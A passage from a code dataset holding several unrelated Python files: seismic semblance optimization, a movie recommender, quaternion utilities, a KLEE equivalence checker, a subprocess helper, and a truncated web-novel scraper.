calcStreamMap[trace].stats.npts\n\n ############################################################################\n traces = num.ndarray (shape=(len(calcStreamMap), minSampleCount), dtype=float)\n traveltime = num.ndarray (shape=(len(calcStreamMap), dimX*dimY), dtype=float)\n latv = num.ndarray (dimX*dimY, dtype=float)\n lonv = num.ndarray (dimX*dimY, dtype=float)\n ############################################################################\n\n\n c=0\n streamCounter = 0\n\n for key in calcStreamMap.keys():\n streamID = key\n c2 = 0\n\n for o in calcStreamMap[key]:\n if c2 < minSampleCount:\n traces[c][c2] = o\n\n c2 += 1\n\n\n for key in TTTGridMap.keys():\n\n if streamID == key:\n traveltimes[streamCounter] = TTTGridMap[key]\n else:\n \"NEIN\", streamID, key\n\n\n if not streamCounter in traveltimes :\n continue #hs : thread crashed before\n\n g = traveltimes[streamCounter]\n dimZ = g.dimZ\n mint = g.mint\n maxt = g.maxt\n Latul = g.Latul\n Lonul = g.Lonul\n Lator = g.Lator\n Lonor = g.Lonor\n\n gridElem = g.GridArray\n\n for x in range(dimX):\n for y in range(dimY):\n elem = gridElem[x, y]\n\n traveltime [c][x * 
dimY + y] = elem.tt\n latv [x * dimY + y] = elem.lat\n lonv [x * dimY + y] = elem.lon\n #endfor\n\n c += 1\n streamCounter += 1\n\n #endfor\n\n\n ############################## CALCULATE PARAMETER FOR SEMBLANCE CALCULATION ##################\n nsamp = winlen * new_frequence\n\n nstep = int (step*new_frequence)\n migpoints = dimX * dimY\n\n dimZ = 0\n new_frequence = cfg.newFrequency () # ['new_frequence']\n maxp = int (Config['ncore'])\n\n\n Logfile.add ('PROCESS %d NTIMES: %d' % (flag,ntimes))\n\n if False :\n print ('nostat ',nostat,type(nostat))\n print ('nsamp ',nsamp,type(nsamp))\n print ('ntimes ',ntimes,type(ntimes))\n print ('nstep ',nstep,type(nstep))\n print ('dimX ',dimX,type(dimX))\n print ('dimY ',dimY,type(dimY))\n print ('mint ',Gmint,type(mint))\n print ('new_freq ',new_frequence,type(new_frequence))\n print ('minSampleCount ',minSampleCount,type(minSampleCount))\n print ('latv ',latv,type(latv))\n print ('traces',traces,type(traces))\n print ('traveltime',traveltime,type(traveltime))\n\n\n#==================================semblance calculation========================================\n\n t1 = time.time()\n traces = traces.reshape (1,nostat*minSampleCount)\n traveltime = traveltime.reshape (1,nostat*dimX*dimY)\n USE_C_CODE = True\n try:\n if USE_C_CODE :\n import Cm\n import CTrig\n start_time = time.time()\n k = Cm.otest (maxp,nostat,nsamp,ntimes,nstep,dimX,dimY,Gmint,new_frequence,\n minSampleCount,latv,lonv,traveltime,traces)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n else :\n start_time = time.time()\n k = otest (maxp,nostat,nsamp,ntimes,nstep,dimX,dimY,Gmint,new_frequence,\n minSampleCount,latv,lonv,traveltime,traces) #hs\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n except:\n print(\"loaded tttgrid has probably wrong dimensions or stations, delete\\\n ttgrid or exchange\")\n\n t2 = time.time()\n\n\n partSemb = k\n\n partSemb_syn = partSemb.reshape (ntimes,migpoints)\n\n\n return partSemb_syn\n\ndef optimization(*params, **args):\n counter = params[1]\n Config = params[2]\n Wdf = params[3]\n FilterMeta = params[4]\n mint = params[5]\n maxt = params[6]\n TTTGridMap = params[7]\n Folder = params[8]\n Origin = params[9]\n ntimes = params[10]\n switch = params[11]\n ev = params[12]\n arrayfolder = params[13]\n syn_in = params[14]\n data = params[15]\n evpath = params[16]\n XDict = params[17]\n RefDict = params[18]\n workdepth = params[19]\n filterindex = params[20]\n Wdfs = params[21]\n\n networks = Config['networks'].split(',')\n params = num.asarray(params)\n parameter = num.ndarray.tolist(params)\n ASL_syn = []\n\n\n C = config.Config (evpath)\n Config = C.parseConfig ('config')\n cfg = ConfigObj (dict=Config)\n if cfg.pyrocko_download() == True:\n Meta = C.readpyrockostations()#\n\n elif cfg.colesseo_input() == True:\n scenario = guts.load(filename=cfg.colosseo_scenario_yml())\n scenario_path = cfg.colosseo_scenario_yml()[:-12]\n Meta = C.readcolosseostations(scenario_path)\n else:\n Meta = C.readMetaInfoFile()\n l = 0\n for i in networks:\n\n arrayname = i\n arrayfolder = os.path.join (Folder['semb'],arrayname)\n\n network = Config[i].split('|')\n\n FilterMeta = ttt.filterStations (Meta,Config,Origin,network)\n\n if len(FilterMeta) < 3: continue\n\n W = XDict[i]\n refshift = RefDict[i]\n\n FilterMeta = cmpFilterMetavsXCORR (W, FilterMeta)\n\n Logfile.add ('BOUNDING BOX DIMX: %s DIMY: %s GRIDSPACING: %s \\n'\n % (Config['dimx'],Config['dimy'],Config['gridspacing']))\n\n f = open('../tttgrid/tttgrid_%s_%s_%s.pkl' % (ev.time, 
arrayname, workdepth), 'rb')\n TTTGridMap,mint,maxt = pickle.load(f)\n f.close()\n\n\n switch = filterindex\n\n tw = times.calculateTimeWindows (mint,maxt,Config,ev, switch)\n Wdf = Wdfs[l]\n semb_syn = doCalc_syn (counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder, syn_in,\n parameter[0])\n ASL_syn.append(semb_syn)\n counter += 1\n l += 1\n\n sembmax_syn = sembCalc.collectSemb(ASL_syn,Config,Origin,Folder,ntimes,len(networks),switch)\n\n misfit_list = [] # init a list for a all the singular misfits\n norm_list = [] # init a list for a all the singular normalizations\n taper = trace.CosFader(xfade=2.0) # Cosine taper with fade in and out of 2s.\n bw_filter = trace.ButterworthResponse(corner=0.000055, # in Hz\n order=4,\n type='high') # \"low\"pass or \"high\"pass\n setup = trace.MisfitSetup(description='Misfit Setup',\n norm=2, # L1 or L2 norm\n taper=taper,\n filter=bw_filter,\n domain='time_domain')\n nsamples = len(data)\n tmin = util.str_to_time('2010-02-20 15:15:30.100')\n tr = trace.Trace(station='TEST', channel='Z',\n deltat=0.5, tmin=tmin, ydata=data)\n syn = trace.Trace(station='TEST', channel='Z',\n deltat=0.5, tmin=tmin, ydata=sembmax_syn)\n misfit, norm = tr.misfit(candidate=syn, setup=setup) # calculate the misfit of a single observed trace with its synthetics\n # with the setup from above\n misfit_list.append(misfit), norm_list.append(norm) # append the misfit into a list\n global_misfit_normed = num.sqrt(num.nansum((num.asarray(misfit_list))**2) / # sum all the misfits and normalize to get a single minimizable value\n num.nansum((num.asarray(norm_list))**2))\n return global_misfit_normed\n\n\ndef solve(counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder,\n syn_in, ASL_d, sembmax_d, evpath, XDict,\n RefDict, workdepth, filterindex, Wdfs):\n import scipy\n t = time.time() # start timing\n # bounds given as (min,max)\n\n bounds = ((syn_in.mag_0_low(), syn_in.mag_0_high()), # magnitude\n (syn_in.strike_0_low(), syn_in.strike_0_high()), # strike [deg.]\n (syn_in.dip_0_low(), syn_in.dip_0_high()), # dip [deg.]\n (syn_in.rake_0_low(), syn_in.rake_0_high()), # rake [deg.]\n (syn_in.depth_0_low()*km, syn_in.depth_0_high()*km), # depth [km]\n (syn_in.north_shift_0_low()*km, syn_in.north_shift_0_high()*km), # north shift from GCMT [km]\n (syn_in.east_shift_0_low()*km, syn_in.east_shift_0_high()*km), # east shift from GCMT [km]\n (syn_in.time_0_low(), syn_in.time_0_high())) # timeshift from GCMT [s]\n # optimize.differential_evolution of scipy is used for the optim.\n # Differential Evolution is stochastic in nature (does not use gradient methods)\n #to find the minimium, and can search large areas of candidate space, but often requires\n #larger numbers of function evaluations than conventional gradient based techniques.\n # The scipy solver can easily be exchanged.\n\n data = sembmax_d\n result = scipy.optimize.differential_evolution(optimization, bounds=bounds, maxiter=3, popsize=3, args=(counter,Config,Wdf,FilterMeta,mint,maxt,TTTGridMap,\n Folder,Origin,ntimes,switch, ev,arrayfolder, syn_in, data, evpath, XDict, RefDict, workdepth, filterindex, Wdfs))\n elapsed = time.time() - t # get the processing time\n print(result.x)\n","repo_name":"braunfuss/Palantiri","sub_path":"src/process/optim_csemb.py","file_name":"optim_csemb.py","file_ext":"py","file_size_in_byte":47195,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} 
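The record above ends by handing its misfit function to scipy's differential-evolution solver. A minimal, self-contained sketch of that optimizer pattern, assuming only numpy and scipy; the toy cost function and 2-D bounds below are illustrative stand-ins for the source's magnitude/strike/dip/rake/depth/shift/time parameters:

import numpy as np
from scipy.optimize import differential_evolution

def cost(x):
    # toy objective with a single global minimum at (3, -2),
    # standing in for the semblance-misfit objective in the record above
    return (x[0] - 3.0) ** 2 + (x[1] + 2.0) ** 2

bounds = [(-10.0, 10.0), (-10.0, 10.0)]  # one (min, max) pair per parameter
result = differential_evolution(cost, bounds=bounds, maxiter=50, popsize=15, seed=43)
print(result.x, result.fun)  # best parameter vector and its cost

Because the solver only ever evaluates cost(x) on candidate vectors, any black-box misfit (like the semblance comparison in the record) can be dropped in without derivatives; it is stochastic and gradient-free, so small budgets such as maxiter=3, popsize=3 in the source keep runs short at the cost of convergence.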
+{"seq_id":"34806688792","text":"print(\"line1 main\")\nfrom EmgReader import *\nfrom ActionSender import *\nfrom Transformer import *\nfrom EmgController import *\n\nprint(\"line7 main\")\nemgReader = Adc('ads1115')\nactionSender = ActionSender()\nconfigPath = 'config.ini'\ntransformer = Transformer(configPath, emgReader)\n\n\nprint(\"line14 main\")\ne = EmgController(actionSender, transformer)\ncounter = 0\nwhile True:\n if counter == 100:\n counter = 0\n print(\"while true\")\n e.getNewAction()\n counter += 1\n","repo_name":"Sabrowna/EmgAnalyser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34974574279","text":"# Otis Scott\n# CS - UY 1114\n# 10 Oct 2018\n# Homework 5\n\nneedle = input(\"Enter needle: \")\nhaystack = input(\"Enter haystack: \")\nposition = -1\nfor each in range(0, len(haystack) + 1 - len(needle)):\n if haystack[each:each + len(needle)] == needle:\n position = each\n break\n\nif position == -1:\n print(\"Needle not found in haystack\")\nelse:\n print(\"Needle found in haystack at position \" + str(position))\n","repo_name":"otisscott/1114-Stuff","sub_path":"Homework 5/oms275_hw5_q7.py","file_name":"oms275_hw5_q7.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20426091298","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle \r\n\r\nmovies = pd.read_csv('movies.csv')\r\n\r\n\r\n\r\n# Make a census of the genre keywords\r\ngenre_labels = set()\r\nfor s in movies['genres'].str.split('|').values:\r\n genre_labels = genre_labels.union(set(s))\r\n\r\n# Function that counts the number of times each of the genre keywords appear\r\ndef count_word(dataset, ref_col, census):\r\n keyword_count = dict()\r\n for s in census: \r\n keyword_count[s] = 0\r\n for census_keywords in dataset[ref_col].str.split('|'): \r\n if type(census_keywords) == float and pd.isnull(census_keywords): \r\n continue \r\n for s in [s for s in census_keywords if s in census]: \r\n if pd.notnull(s): \r\n keyword_count[s] += 1\r\n #______________________________________________________________________\r\n # convert the dictionary in a list to sort the keywords by frequency\r\n keyword_occurences = []\r\n for k,v in keyword_count.items():\r\n keyword_occurences.append([k,v])\r\n keyword_occurences.sort(key = lambda x:x[1], reverse = True)\r\n return keyword_occurences, keyword_count\r\n\r\n# Calling this function gives access to a list of genre keywords which are sorted by decreasing frequency\r\nkeyword_occurences, dum = count_word(movies, 'genres', genre_labels)\r\n\r\n\r\n# Break up the big genre string into a string array\r\nmovies['genres'] = movies['genres'].str.split('|')\r\n# Convert genres to string value\r\nmovies['genres'] = movies['genres'].fillna(\"\").astype('str')\r\n\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\ntf = TfidfVectorizer(analyzer='word',ngram_range=(1, 2),min_df=0, stop_words='english')\r\ntfidf_matrix = tf.fit_transform(movies['genres'])\r\n#tfidf_matrix.shape\r\n\r\nfrom sklearn.metrics.pairwise import linear_kernel\r\ncosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\r\n#cosine_sim[:4, :4]\r\n\r\n# Build a 1-dimensional array with movie titles\r\ntitles = movies['title']\r\nindices = pd.Series(movies.index, index=movies['title'])\r\n\r\n# Function that 
get movie recommendations based on the cosine similarity score of movie genres\r\ndef genre_recommendations(title):\r\n idx = indices[title]\r\n sim_scores = list(enumerate(cosine_sim[idx]))\r\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\r\n sim_scores = sim_scores[1:21]\r\n movie_indices = [i[0] for i in sim_scores]\r\n return titles.iloc[movie_indices]\r\n\r\n#recomm = genre_recommendations('Good Will Hunting (1997)')\r\nrecomm = genre_recommendations('Othello (1995)')\r\n\r\npickle.dump(recomm,open('model.pkl','wb'))\r\n\r\n\r\nmodel=pickle.load(open('model.pkl','rb'))\r\n\r\n#recomm = model.load(model)\r\n\r\n#recomm1 = model.genre_recommendation('Good Will Hunting (1997)')","repo_name":"thakkarrahul01/movie-recommender","sub_path":"movies_recommender.py","file_name":"movies_recommender.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35321657012","text":"import math\n\n\ndef polysum(n, s):\n '''given number of sides (n) and edge length (s),\n return the sum of area and perimeter**2 rounded to 4 decimal places'''\n area = n * s * s / math.tan(math.pi / n) / 4.0\n perimeter = n * s\n return round(area + perimeter**2, 4)\n\nif __name__ == '__main__':\n assert polysum(4, 1) == 17\n","repo_name":"qpxu007/python-snippets","sub_path":"checkio/polysum.py","file_name":"polysum.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"479768263","text":"import math\r\nimport numpy as np\r\n\r\n# --- Helper Functions ----\r\n\r\n\r\n# Deg/s -> Rad/s\r\ndef convert_deg_to_rads(X, Y, Z):\r\n \"\"\"\r\n Converts all values in 3 lists in radian equivalent\r\n :param X: list X\r\n :param Y: list Y\r\n :param Z: list Z\r\n :return: lists XYZ w/ values converted into radians\r\n \"\"\"\r\n X = [math.radians(x) for x in X]\r\n Y = [math.radians(x) for x in Y]\r\n Z = [math.radians(x) for x in Z]\r\n return X, Y, Z\r\n\r\n\r\n# Normalize Vectors\r\ndef normalize(X, Y, Z):\r\n \"\"\"\r\n Normalizes 3 vectors, XYZ. 
In the case of a vector with 0 magnitude, to avoid NaN errors,\r\n the 0 vector is simply returned.\r\n :param X: list X\r\n :param Y: list Y\r\n :param Z: list Z\r\n :return: normalized vectors XYZ\r\n \"\"\"\r\n # Calculate magnitude of vectors\r\n mag_X = math.sqrt(sum([x ** 2 for x in X]))\r\n mag_Y = math.sqrt(sum([x ** 2 for x in Y]))\r\n mag_Z = math.sqrt(sum([x ** 2 for x in Z]))\r\n\r\n # Normalize vectors (handling 0 cases)\r\n if mag_X != 0:\r\n X = [x / mag_X for x in X]\r\n else:\r\n X = [0 for x in X]\r\n if mag_Y != 0:\r\n Y = [x / mag_Y for x in Y]\r\n else:\r\n Y = [0 for x in Y]\r\n if mag_Z != 0:\r\n Z = [x / mag_Z for x in Z]\r\n else:\r\n Z = [0 for x in Z]\r\n\r\n return X, Y, Z\r\n\r\n\r\n# Convert V & Theta angles to Quaternions\r\ndef v_theta_to_quaternion(v, theta):\r\n \"\"\"\r\n Converts normalized vector v and angle of rotation theta into quaternion format\r\n :param v: normalized 3d vector, v_x, v_y, v_z\r\n :param theta: angle of rotation, rads\r\n :return: quaternion equivalent of v, theta -> wxyz\r\n \"\"\"\r\n v_x, v_y, v_z = v[0], v[1], v[2]\r\n w = math.cos(theta / 2)\r\n x = v_x * math.sin(theta / 2)\r\n y = v_y * math.sin(theta / 2)\r\n z = v_z * math.sin(theta / 2)\r\n return w, x, y, z\r\n\r\n\r\n# Convert Euler Angle to Quaternion\r\ndef euler_to_quaternion(yaw, pitch, roll):\r\n \"\"\"\r\n Converts euler (yaw, pitch, roll) to quaternion equivalent (x, x, y, z)\r\n :param yaw: radians\r\n :param pitch: radians\r\n :param roll: radians\r\n :return: quaternion wxyz\r\n \"\"\"\r\n cy = math.cos(yaw * 0.5)\r\n sy = math.sin(yaw * 0.5)\r\n cp = math.cos(pitch * 0.5)\r\n sp = math.sin(pitch * 0.5)\r\n cr = math.cos(roll * 0.5)\r\n sr = math.sin(roll * 0.5)\r\n w = cy * cp * cr + sy * sp * sr\r\n x = cy * cp * sr - sy * sp * cr\r\n y = sy * cp * sr + cy * sp * cr\r\n z = sy * cp * cr - cy * sp * sr\r\n return w, x, y, z\r\n\r\n\r\n# Convert Quaternion to Euler (assumes quaternion is normalized)\r\ndef quaternion_to_euler(q):\r\n \"\"\"\r\n Converts quaternion wxyz into euler format xyz\r\n :param q: quaternion\r\n :return: euler representation, xyz\r\n \"\"\"\r\n W = q[0]\r\n X = q[1]\r\n Y = q[2]\r\n Z = q[3]\r\n\r\n # roll(x - axis rotation)\r\n sinr_cosp = +2.0 * (W * X + Y * Z)\r\n cosr_cosp = +1.0 - 2.0 * (X * X + Y * Y)\r\n roll = math.atan2(sinr_cosp, cosr_cosp)\r\n\r\n # pitch(y - axis rotation)\r\n sinp = +2.0 * (W * Y - Z * X)\r\n if abs(sinp) >= 1:\r\n pitch = np.copysign(math.pi / 2, sinp) # use 90 degrees if out of range\r\n else:\r\n pitch = math.asin(sinp)\r\n\r\n # yaw(z - axis rotation)\r\n siny_cosp = +2.0 * (W * Z + X * Y)\r\n cosy_cosp = +1.0 - 2.0 * (Y * Y + Z * Z)\r\n yaw = math.atan2(siny_cosp, cosy_cosp)\r\n\r\n return roll, pitch, yaw\r\n\r\n\r\n# Quaternion to conjugate (inverse rotation)\r\ndef quaternion_to_conjugate(q):\r\n \"\"\"\r\n Calculates conjugate of quaternion\r\n :param q: quaternion\r\n :return: quaternion conjugate\r\n \"\"\"\r\n # q = [s,v] | The conjugate, q* = [s, -v]\r\n return [q[0], -q[1], -q[2], -q[3]]\r\n\r\n\r\n# Quaternion Product A * B\r\ndef quaternion_product(q1, q2):\r\n \"\"\"\r\n Returns the quaternion product\r\n :param q1: quaternion q1\r\n :param q2: quaternion q2\r\n :return: quaternion product q1 * q2\r\n \"\"\"\r\n Wa = q1[0]\r\n Wb = q2[0]\r\n Xa = q1[1]\r\n Xb = q2[1]\r\n Ya = q1[2]\r\n Yb = q2[2]\r\n Za = q1[3]\r\n Zb = q2[3]\r\n x = Xa * Wb + Ya * Zb - Za * Yb + Wa * Xb\r\n y = -Xa * Zb + Ya * Wb + Za * Xb + Wa * Yb\r\n z = Xa * Yb - Ya * Xb + Za * Wb + Wa * Zb\r\n w = -Xa * Xb - Ya * Yb - 
Za * Zb + Wa * Wb\r\n return [w, x, y, z]\r\n\r\n\r\n# Calcs angle between two 3D vectors\r\ndef angle_between_vectors(u, v):\r\n \"\"\"\r\n Returns angle between two 3d vectors\r\n :param u: 3d vector\r\n :param v: 3d vector\r\n :return: angle between two vectors\r\n \"\"\"\r\n mag_u = math.sqrt(u[0]**2 + u[1]**2 + u[2]**2)\r\n mag_v = math.sqrt(v[0]**2 + v[1]**2 + v[2]**2)\r\n dot_prod = u[0] * v[0] + u[1] * v[1] + u[2] * v[2]\r\n return math.acos(dot_prod/(mag_u*mag_v))\r\n\r\n\r\n# Rotates xyz vector by quaternion wxyz\r\ndef point_rotation_by_quaternion(v, q):\r\n \"\"\"\r\n Rotates vector xyz by quaternion wxyz\r\n :param point: 3d vector xyz\r\n :param q: quaternionn wxyz\r\n :return: new orientation of vector xyz\r\n \"\"\"\r\n r = [0] + v\r\n q_conj = [q[0], -q[1], -q[2], -q[3]]\r\n return quaternion_product(quaternion_product(q, r), q_conj)[1:]\r\n\r\n","repo_name":"OGGraham/VR","sub_path":"helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7054980929","text":"# Problem No.: 13549\n# Solver: Jinmin Goh\n# Date: 20200417\n# URL: https://www.acmicpc.net/problem/13549\n\nimport sys\n\ndef main():\n n, k = map(int, input().split())\n if n >= k:\n print(n - k)\n return\n \n # 0-1 BFS\n deque = [n]\n cost = [None] * 100001\n cost[n] = 0\n while True:\n tempZero = []\n tempOne = []\n while deque:\n temp = deque.pop(0)\n if temp == k:\n print(cost[k])\n return\n if 2 * temp <= 100000 and cost[2 * temp] == None:\n cost[2 * temp] = cost[temp]\n tempZero.append(2 * temp)\n if temp + 1 <= 100000 and cost[temp + 1] == None:\n cost[temp + 1] = cost[temp] + 1\n tempOne.append(temp + 1)\n if temp - 1 >= 0 and cost[temp - 1] == None:\n cost[temp - 1] = cost[temp] + 1\n tempOne.append(temp - 1)\n deque = tempZero + tempOne\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/13549/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4221017574","text":"import subprocess\nfrom colorama import Fore, Style\n\n\n# This class is used for verifying the functional equivalence of two pieces of code using KLEE, a symbolic execution engine.\nclass Verification:\n def __init__(self, compiler, ai):\n self.code = \"\" # The code to be tested\n # This prompt is used to generate a C++ application that can run two C++ functions with symbolic variables created by KLEE.\n # It will also check if they produce the same output (functional equivalence).\n self.generate_prompt = \"Your task is to create a C++ application to run two C++ functions with symbolic variables generated by KLEE and ensure they are functionally equivalent (i.e., the output is the same); you should use assert for the equivalence check. I will provide you with two C++ functions (original code and improved code; each might also have a main function that you may ignore), and you should only return the full code for an application (including the two functions, a wrapper function to call them with symbolic variables and check their equivalance, and a single main() function containing the code to generate symbolic variabels via KLEE) to be able to run KLEE. no text, please; give me the C++ code only. 
no extern C\"\n # This prompt is used to fix any errors reported by KLEE.\n self.verify_prompt = \"I got these errors from KLEE. Please fix all of them: \"\n self.compiler = compiler # The compiler to use\n self.ai = ai # The AI interface to use for generating and fixing the code\n\n # This method generates the verification code, checks if it is functionally equivalent to the original code, and if not, uses AI to fix it.\n def verify_and_fix(self, original_code, generated_code):\n if (self.code == ''):\n self.generate_code(original_code, generated_code)\n verified, error = self.se_verification()\n if not verified:\n print(Fore.RED + 'Verification Error: ' + Style.RESET_ALL + error)\n self.code = self.ai.submit_task(self.verify_prompt + error, self.code)\n self.verify_and_fix(original_code, generated_code)\n\n # This method generates the verification code.\n def generate_code(self, original_code, generated_code):\n prompt = self.generate_prompt + \"\\n\\\\original code\\n\" \\\n + original_code + \"\\n\\\\improved code\\n\" + generated_code\n print(Fore.YELLOW + \"Generating verification code...\" + Style.RESET_ALL)\n self.code = self.ai.submit_task(prompt, self.code)\n self.code = self.compiler.check_and_fix(self.code, None, 1, 'klee_code')\n\n # This method performs the symbolic execution verification using KLEE.\n def se_verification(self):\n klee_command = ['klee', 'klee_code.bc']\n print(Fore.YELLOW + \"Running KLEE...\" + Style.RESET_ALL)\n process = subprocess.run(klee_command, text=True, capture_output=True)\n if process.returncode != 0: # If there's a compilation error\n return False, process.stderr\n return True, None\n","repo_name":"aliireza/cai","sub_path":"cai/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22027730705","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom subprocess import CalledProcessError\nfrom subprocess import PIPE\nfrom subprocess import run as subprocess_run\nfrom typing import Literal\nfrom typing import overload\n\nfrom devenv import constants\nfrom devenv.constants import home\nfrom devenv.constants import homebrew_bin\nfrom devenv.constants import root\nfrom devenv.constants import shell_path\nfrom devenv.constants import VOLTA_HOME\n\nbase_path = f\"{VOLTA_HOME}/bin:{homebrew_bin}:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:{root}/bin\"\nbase_env = {\n \"PATH\": base_path,\n \"HOME\": home,\n \"SHELL\": shell_path,\n \"VOLTA_HOME\": VOLTA_HOME,\n}\n\n\ndef quote(cmd: tuple[str, ...]) -> str:\n \"\"\"convert a command to bash-compatible form\"\"\"\n from pipes import quote\n\n return \" \".join(quote(arg) for arg in cmd)\n\n\ndef xtrace(cmd: tuple[str, ...]) -> None:\n \"\"\"Print a commandline, similar to how xtrace does.\"\"\"\n\n teal = \"\\033[36m\"\n reset = \"\\033[m\"\n bold = \"\\033[1m\"\n\n print(f\"+ {teal}${reset} {bold}{quote(cmd)}{reset}\")\n\n\n@overload\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: Literal[False] = False,\n) -> None:\n ...\n\n\n@overload\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: Literal[True],\n) -> str:\n ...\n\n\ndef run(\n cmd: tuple[str, ...],\n *,\n pathprepend: str = \"\",\n exit: bool = False,\n 
env: dict[str, str] | None = None,\n cwd: Path | str | None = None,\n stdout: bool = False,\n) -> str | None:\n _stdout = PIPE if stdout else None\n del stdout\n\n if env is None:\n env = {}\n env = {**constants.user_environ, **base_env, **env}\n\n if pathprepend:\n env[\"PATH\"] = f\"{pathprepend}:{env['PATH']}\"\n\n if constants.DEBUG:\n xtrace(cmd)\n try:\n proc = subprocess_run(cmd, check=True, stdout=_stdout, cwd=cwd, env=env)\n if _stdout:\n return proc.stdout.decode().strip()\n else:\n return None\n except FileNotFoundError as e:\n # This is reachable if the command isn't found.\n if exit:\n raise SystemExit(f\"{e}\") from None\n else:\n raise RuntimeError(f\"{e}\") from None\n except CalledProcessError as e:\n detail = f\"Command `{quote(e.cmd)}` failed! (code {e.returncode})\"\n if _stdout:\n detail += f\"\"\"\nstdout:\n{\"\" if e.stdout is None else e.stdout.decode()}\n\"\"\"\n if exit:\n raise SystemExit(detail) from None\n else:\n raise RuntimeError(detail) from None\n","repo_name":"getsentry/devenv","sub_path":"devenv/lib/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"36235302062","text":"import re\nimport asyncio\nfrom urllib import parse\n\nfrom bs4 import BeautifulSoup\nfrom playwright.async_api import BrowserContext, async_playwright\nfrom utils import chineseNumber2Int, remove_title, txt_write\n\nweb_name = \"\"\n\n\ndef get_catalogue_url_list(catalogue_url, content, selector=\"div#list dd\"):\n catalogue_soup = BeautifulSoup(content, \"lxml\")\n # print(catalogue_soup)\n try:\n now_title = catalogue_soup.h1.string\n except AttributeError:\n now_title = input(\"Failed to get the novel title, please enter it manually: \")\n zhangjie_list = catalogue_soup.select(selector)\n print(f\"Fetched {len(zhangjie_list)} chapter links\")\n for i in range(len(zhangjie_list)):\n relative_link = zhangjie_list[i].a[\"href\"]\n zhangjie_list[i] = parse.urljoin(catalogue_url, relative_link)\n return zhangjie_list, now_title\n\n\ndef get_novel_content(novel_page, novel_title, selector=\"div#content\"):\n novel_soup = BeautifulSoup(novel_page, \"lxml\")\n zhangjie_title = str(novel_soup.h1.string).strip()\n zhangjie_title_correct = re.compile(\"正文卷\")\n if re.match(zhangjie_title_correct, zhangjie_title):\n zhangjie_title = zhangjie_title[4:]\n num_pattern = re.compile(r\"^\\s?第?([0-9一二三四五六七八九十百千万亿零壹贰叁肆伍陆柒捌玖拾佰仟]+)[章张]{0,1}\")\n title_match = re.match(num_pattern, zhangjie_title)\n if title_match:\n raw_num = title_match.group(1)\n if not raw_num.isdecimal():\n raw_num = chineseNumber2Int(raw_num)\n zhangjie_num = f\"第{str(raw_num)}章\"\n zhangjie_title = zhangjie_title.replace(title_match.group(0), zhangjie_num)\n novel_content_tag_list = novel_soup.select(selector)\n if len(novel_content_tag_list) > 0:\n novel_content_tag = novel_soup.select(selector)[0]\n else:\n print(f\"{zhangjie_title} has no {selector}\")\n print(novel_soup)\n return\n novel_content_tag = novel_soup.select(selector)[0]\n for extract_element in novel_content_tag.find_all(\"div\"):\n extract_element.extract()\n\n novel_text = novel_content_tag.get_text(\"\\n\\t\", strip=True)\n\n text_pattern = re.compile(\"(正在手打中,请稍等片刻,内容更新后,请重新刷新页面,即可获取最新更新!)|(网页版章节内容慢)\")\n if len(novel_text) < 400 and re.search(text_pattern, novel_text):\n print(f\"Skipped: {zhangjie_title}\")\n return\n\n novel_text += \"\\n\\n\"\n txt_write(novel_title + web_name, zhangjie_title, novel_text)\n\n\nasync def get_page_content(context: BrowserContext, url: str, wait_until: str = 
\"domcontentloaded\"):\n page = await context.new_page()\n for _ in range(5):\n try:\n resp = await page.goto(url, wait_until=wait_until)\n except TimeoutError:\n continue\n if resp.status == 200:\n break\n await asyncio.sleep(5.0)\n else:\n raise TimeoutError(f\"{url}获取失败\")\n content = await page.content()\n await page.close()\n return content\n\n\nasync def main(catalogue_url, start_num=0, catalogue_selector=\"div#list dd\", novel_selector=\"div#content\"):\n print(\"无头浏览器启动中\")\n p = await async_playwright().start()\n browser = await p.chromium.launch()\n # browser = p.chromium.launch(headless=False)\n context = await browser.new_context(\n java_script_enabled=True,\n user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\",\n )\n context.set_default_timeout(300000.00)\n\n print(\"开始获取小说目录列表\")\n content = await get_page_content(context, catalogue_url)\n url_list, novel_title = 